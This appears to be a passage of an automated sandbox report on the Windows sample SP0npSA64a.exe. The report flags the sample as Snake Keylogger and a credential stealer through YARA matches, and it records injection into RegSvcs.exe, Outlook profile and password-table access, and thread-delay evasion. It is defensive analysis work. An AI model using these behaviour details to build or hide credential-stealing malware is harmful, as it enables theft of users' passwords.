                  Source: SP0npSA64a.exe, 00000000.00000003.2224706266.00000000048DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SP0npSA64a.exe
                  Source: SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SP0npSA64a.exe
                  Source: SP0npSA64a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: SP0npSA64a.exe PID: 6220, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeFile created: C:\Users\user\AppData\Local\Temp\CounteeJump to behavior
                  Source: SP0npSA64a.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002DF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: SP0npSA64a.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeFile read: C:\Users\user\Desktop\SP0npSA64a.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\SP0npSA64a.exe "C:\Users\user\Desktop\SP0npSA64a.exe"
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SP0npSA64a.exe"
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SP0npSA64a.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: msdart.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: SP0npSA64a.exeStatic file information: File size 1220337 > 1048576
                  Source: Binary string: wntdll.pdbUGP source: SP0npSA64a.exe, 00000000.00000003.2225873436.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, SP0npSA64a.exe, 00000000.00000003.2226120288.0000000004610000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: SP0npSA64a.exe, 00000000.00000003.2225873436.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, SP0npSA64a.exe, 00000000.00000003.2226120288.0000000004610000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: SP0npSA64a.exeStatic PE information: real checksum: 0xa961f should be: 0x13716b
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeAPI/Special instruction interceptor: Address: 3FABA9C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599886Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599407Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599282Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599157Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597489Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596491Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596032Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595907Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8382Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1437Jump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87668
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeAPI coverage: 3.8 %
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
